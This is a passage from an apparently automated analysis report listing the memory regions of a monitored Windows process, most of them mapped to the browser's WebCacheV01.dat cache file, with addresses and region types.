"c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1331 start_va = 0xa80000 end_va = 0xa8ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1332 start_va = 0xa90000 end_va = 0xa9ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1333 start_va = 0xaa0000 end_va = 0xaaffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1334 start_va = 0xab0000 end_va = 0xabffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1335 start_va = 0xac0000 end_va = 0xacffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1336 start_va = 0xad0000 end_va = 0xbcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ad0000" filename = "" Region: id = 1337 start_va = 0xbd0000 end_va = 0xd57fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bd0000" filename = "" Region: id = 1338 start_va = 0xd60000 end_va = 0xee0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d60000" filename = "" Region: id = 1339 start_va = 0xef0000 end_va = 0x22effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ef0000" filename = "" Region: id = 1340 start_va = 0x22f0000 end_va = 0x22fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000022f0000" filename = "" Region: id = 1341 start_va = 0x2300000 end_va = 0x230ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002300000" filename = "" Region: id = 1342 start_va = 0x2310000 end_va = 0x231ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002310000" filename = "" Region: id = 1343 start_va = 0x2320000 end_va = 0x232ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002320000" filename = "" Region: id = 1344 start_va = 0x2330000 end_va = 0x233ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002330000" filename = "" Region: id = 1345 start_va = 0x2340000 end_va = 0x234ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002340000" filename = "" Region: id = 1346 start_va = 0x2350000 end_va = 0x235ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1347 start_va = 0x2360000 end_va = 0x236ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1348 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1349 start_va = 0x2380000 end_va = 0x238ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1350 start_va = 0x2390000 end_va = 0x239ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1351 start_va = 0x23a0000 end_va = 0x23affff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1352 start_va = 0x23b0000 end_va = 0x23bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023b0000" filename = "" Region: id = 1353 start_va = 0x23c0000 end_va = 0x24bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023c0000" filename = "" Region: id = 1354 start_va = 0x24c0000 end_va = 0x24cffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1355 start_va = 0x24d0000 end_va = 0x24dffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1356 start_va = 0x24e0000 end_va = 0x24effff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1357 start_va = 0x24f0000 end_va = 0x24fffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1358 start_va = 0x2500000 end_va = 0x250ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1359 start_va = 0x2510000 end_va = 0x251ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1360 start_va = 0x2520000 end_va = 0x252ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1361 start_va = 0x2530000 end_va = 0x253ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1362 start_va = 0x2540000 end_va = 0x254ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1363 start_va = 0x2550000 end_va = 0x255ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1364 start_va = 0x2560000 end_va = 0x256ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1365 start_va = 0x2570000 end_va = 0x257ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1366 start_va = 0x2580000 end_va = 0x258ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1367 start_va = 0x2590000 end_va = 0x259ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1368 start_va = 0x25a0000 end_va = 0x25affff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1369 start_va = 0x25b0000 end_va = 0x25bffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1370 start_va = 0x25c0000 end_va = 0x28f6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1371 start_va = 0x2900000 end_va = 0x38fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 1372 start_va = 0x3900000 end_va = 0x398ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003900000" filename = "" Region: id = 1373 start_va = 0x3990000 end_va = 0x399ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1374 start_va = 0x39a0000 end_va = 0x39affff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1375 start_va = 0x39b0000 end_va = 0x39bffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1376 start_va = 0x39c0000 end_va = 0x39cffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1377 start_va = 0x39d0000 end_va = 0x39dffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1378 start_va = 0x39e0000 end_va = 0x39effff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1379 start_va = 0x39f0000 end_va = 0x39fffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1380 start_va = 0x3a00000 end_va = 0x3a07fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a00000" filename = "" Region: id = 1381 start_va = 0x3a10000 end_va = 0x3a1ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1382 start_va = 0x3a20000 end_va = 0x3a2ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1383 start_va = 0x3a30000 end_va = 0x3a3ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1384 start_va = 0x3a40000 end_va = 0x3a4ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1385 start_va = 0x3a50000 end_va = 0x3a57fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a50000" filename = "" Region: id = 1386 start_va = 0x3a60000 end_va = 0x3a6ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1387 start_va = 0x3a70000 end_va = 0x3a7ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1388 start_va = 0x3a80000 end_va = 0x3a8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a80000" filename = "" Region: id = 1389 start_va = 0x3a90000 end_va = 0x3a9ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1390 start_va = 0x3aa0000 end_va = 0x3aaffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1391 start_va = 0x3ab0000 end_va = 0x3abffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1392 start_va = 0x3ac0000 end_va = 0x3acffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1393 start_va = 0x3ad0000 end_va = 0x3adffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1394 start_va = 0x3ae0000 end_va = 0x3aeffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1395 start_va = 0x3af0000 end_va = 0x3afffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1396 start_va = 0x3b00000 end_va = 0x3b0ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1397 start_va = 0x3b10000 end_va = 0x3b1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003b10000" filename = "" Region: id = 1398 start_va = 0x3b20000 end_va = 0x3b2ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1399 start_va = 0x3b30000 end_va = 0x3b3ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1400 start_va = 0x3b40000 end_va = 0x3b4ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1401 start_va = 0x3b50000 end_va = 0x3c4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b50000" filename = "" Region: id = 1402 start_va = 0x3c50000 end_va = 0x3c5ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1403 start_va = 0x3c60000 end_va = 0x3c6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c60000" filename = "" Region: id = 1404 start_va = 0x3c70000 end_va = 0x3c7ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1405 start_va = 0x3c80000 end_va = 0x3c8ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1406 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1407 start_va = 0x3ca0000 end_va = 0x3caffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1408 start_va = 0x3cb0000 end_va = 0x3daffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cb0000" filename = "" Region: id = 1409 start_va = 0x3db0000 end_va = 0x3eaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003db0000" filename = "" Region: id = 1410 start_va = 0x3eb0000 end_va = 0x3ebffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1411 start_va = 0x3ec0000 end_va = 0x3ecffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1412 start_va = 0x3ed0000 end_va = 0x3edffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1413 start_va = 0x3ee0000 end_va = 0x3eeffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1414 start_va = 0x3ef0000 end_va = 0x3efffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1415 start_va = 0x3f00000 end_va = 0x3f0ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1416 start_va = 0x3f10000 end_va = 0x3f1ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1417 start_va = 0x3f20000 end_va = 0x3f2ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1418 start_va = 0x3f30000 end_va = 0x3f3ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1419 start_va = 0x3f40000 end_va = 0x3f4ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1420 start_va = 0x3f50000 end_va = 0x3f5ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1421 start_va = 0x3f60000 end_va = 0x3f6ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1422 start_va = 0x3f70000 end_va = 0x3f7ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = 